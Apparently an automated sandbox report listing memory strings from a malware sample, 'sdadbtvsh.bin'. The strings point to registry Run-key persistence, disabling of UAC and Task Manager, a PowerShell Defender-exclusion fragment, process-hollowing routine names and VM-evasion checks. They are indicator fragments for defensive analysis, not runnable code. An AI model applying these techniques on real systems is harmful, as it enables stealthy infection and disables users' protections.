                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_szdpnmemstr_dc766901-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @$wp]memstr_536cbe91-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: da3m.memstr_7eb8d369-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6y@qjmemstr_8a10d363-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gxsqymemstr_028c3de2-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_sztmemstr_77b06294-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_sz2rmemstr_3d96ecca-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: le6qtmemstr_65140e00-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6~eromemstr_f5b81a22-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ni_setmemstr_67451a9b-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run9smemstr_011407a7-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\wrse\nngqrvwq.xlmemstr_2617ed09-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .\device\harddiskvolume3usmemstr_d8e58357-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .\device\harddiskvolume3 memstr_a1a5668e-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .\device\harddiskvolume37memstr_9263815f-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .\device\harddiskvolume3memstr_7922f5b3-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .\device\harddiskvolume3|memstr_9288a04d-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: enableluatware\microsomemstr_f02350a7-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_dwordmemstr_2dde727e-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuser.exe/memstr_74b289a0-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_pathchine\soft&memstr_7a072fee-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_folder9memstr_2486c7aa-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ini_settings0memstr_07ec74cd-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startup2memstr_0b9e660e-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: settingsfnmemstr_7b72133b-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupkeymemstr_d5b7d2f4-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_foldere /sc mimemstr_a359fa7d-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: update.vbsnmemstr_93feacee-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_pathamemstr_36881846-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: settingsfnxmemstr_7d66eb9e-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_foldersmemstr_91d2641c-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dir3ctory_pathejmemstr_e44b06b7-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservice.exemmemstr_a7490cac-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_folderdmemstr_5f7bbed3-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: update.vbs_memstr_abeff0a7-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ini_settingsvmemstr_c8452f69-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dir3ctory_pathememstr_4065536c-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start.vbsmemstr_dbeb4a65-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ini_settingsmemstr_e181be5f-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windowsrepairememstr_3af8a476-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: enableluamemstr_b30dc0a8-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start.lnkmemstr_1f0244ed-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupkeyware\microsomemstr_7149cfa1-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_pathmemstr_202f3d4b-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: const hidden = 0memstr_4cbd44f1-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_foldermemstr_c1b7a60c-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qsprsmemstr_706951ab-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @(rtmemstr_17d95afa-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tam*.bmemstr_0045b4eb-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @x(rtmemstr_e3c9094a-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hmhqtmemstr_91b6f8df-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlflmemstr_084bb939-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: countermemstr_d9895a5d-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start memstr_a4c5ec90-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlfhptmemstr_25846bfc-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ray.exejmemstr_7a1a2c2e-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3bhltmemstr_080fbb02-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eymxo$memstr_e30697c8-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @6b8mtmemstr_dace0ed2-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h[8ltmemstr_cb640584-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mkhltmemstr_4a2950d1-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msxltmemstr_5c206dab-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: script[memstr_ca6bf852-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @x8mtmemstr_fc039222-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gxmtmemstr_dc44330a-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shortmemstr_608465e7-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptjmemstr_87c36bb2-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6_hotmemstr_6045b811-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_szxmemstr_f3804915-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ehrtmemstr_5d86d45f-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8ehmtmemstr_a07fc1dd-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: enm lmemstr_522d35cd-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ho(stmemstr_bbd16feb-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptlmemstr_429507d6-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: file ="memstr_69d6a379-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,hd8otmemstr_e29c4028-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,2j8otmemstr_424ba123-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m'hntmemstr_6a4f68f0-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3)xotmemstr_cfaba98e-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m?xotmemstr_b12f2ca1-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlfhntmemstr_a8c0c16a-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '6xhotmemstr_aa82f0d3-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,88otmemstr_5733a420-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '8hotmemstr_73896cbc-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shortxptmemstr_a94e495b-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: enm8ememstr_70796865-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6:8ptmemstr_e89ae687-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: auexhnmemstr_fc3946c3-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3$8qtmemstr_d32a4f9d-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exe_cmemstr_4b2d79ac-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: batwrite)memstr_3a0757cd-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vbsclose8memstr_3f160631-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu64\software\microsoft\windows\currentversion\runoncewmemstr_01a2dc6d-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vbswritefmemstr_ea4d0f31-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: batclosememstr_04b59799-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupmemstr_51768f26-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_path;memstr_4b5821e7-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_pathrtcutmemstr_04772d44-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu64\software\microsoft\wimemstr_98db566c-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startup2version\runoncmemstr_d720381c-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_pathvmemstr_15822562-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: antitaskpmemstr_9f303e67-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pqgiogoraarleguqldnvhv.exe-memstr_bc04aeee-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_iswow64process:memstr_93d69d38-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_unmapviewofsection3memstr_d2a6bd24-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_allocateexespacememstr_75a408f7-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tbinary_iswow64processkmemstr_f36408f0-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zpsers\user\temp\wgsr.msc@memstr_1a739850-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\msctf.dllvmemstr_d44156c7-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_iswow64processionmemstr_7e1a3a86-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: orleqlmemstr_0019bda9-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p~kppmemstr_fe80db5c-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: psers\user\temp\wgsr.mscmemstr_1c4f5615-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pqgiogoraarleguqldnvhv.exememstr_aa1320be-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wldp.dllocmemstr_68fed33b-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\ntmarta.dllmemstr_ced7edc8-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: heapdecommittotalfreethreshold4memstr_d2213020-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: imagesubsystemmajorversionoldymemstr_40d49742-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: imagesubsystemminorversionexememstr_79bb2735-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: majoroperatingsystemversionmemstr_a2c7872b-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: readonlysharedmemoryheaponhmemstr_f2a0d36a-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: heapdecommittotalfreethresholdamemstr_3683d935-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: heapdecommitfreeblockthreshold~memstr_b76b9c14-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: imagesubsystemmajorversionwmemstr_17c30e68-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: heapdecommitfreeblockthresholdlmemstr_dc5931cc-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: poptionalheaderimagebasenewememstr_e09abb44-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: readonlysharedmemoryheapsholdrmemstr_1cf7ca16-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: readimagefileexecoptionssholdmemstr_97646e5c-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: readonlysharedmemorybaseonmemstr_2aeec6ab-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hrt\sememstr_5dbaaffe-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: imagesubsystemminorversionymemstr_a4229e41-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: readonlystaticserverdatanoldmemstr_883880c2-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r_<r_<@6pmemstr_7217a792-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ioptionalheadersizeofheadersnewmemstr_ec8ca2cb-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ioptionalheadersizeofimagenewmemstr_86718e50-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: readimagefileexecoptionsmemstr_63cf842f-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: minoroperatingsystemversionmemstr_2c94f8e8-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: readonlystaticserverdatamemstr_b5703b2c-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: readonlysharedmemorybasememstr_c9b658e9-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start.cmd"memstr_d4d1beea-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: settingsfn.memstr_c88a9791-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_folder!memstr_663e1706-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: byte[uctcreate8memstr_2fe1499b-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_path3memstr_c01e2a2f-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @echo offmemstr_e0dd84b9-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablesmemstr_dc3caedc-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_folderimemstr_7257dd99-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ini_settingsfile, hidd`memstr_f6a107ea-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_folder{memstr_00395157-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disabletaskmgr\microsoumemstr_64d8281f-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variableslmemstr_d176d7b8-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \start.cmd^memstr_8c9cfca2-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ini_settingseturn = trqmemstr_d123d186-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablesnarymemstr_1dce7744-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupdirmemstr_15e26afd-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd_command_pathmemstr_bd94e64e-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disabletaskmgrmemstr_4b895928-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \start.cmdmemstr_832abf10-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \mshta.exememstr_9539e917-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.quitmemstr_7fbafc5b-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: install_foldercreateobmemstr_6190afe8-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablesciiarraymemstr_4476b9b8-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword;int;dword;struct;ptr;int;int;int;ptr;endstruct,memstr_ef3387c4-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: const waitonreturn = truememstr_c8789ef7-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -command add-mppreference -exclusionpath memstr_9b7804f7-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword pointertosymboltable;ebx; dword edx; dword ecx; {memstr_8444f224-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: word sizeofoptionalheader;jmemstr_be4adb53-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: set wshshell = wscript.createobject(ememstr_3b80c087-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \microsoft.net\framework\v4.0.30319\applaunch.exetmemstr_47f964cc-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword addressofnewexeheadert64 p2home; uint64 p3home; memstr_b359621b-a
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005FBB02 SendInput,keybd_event,8_2_005FBB02
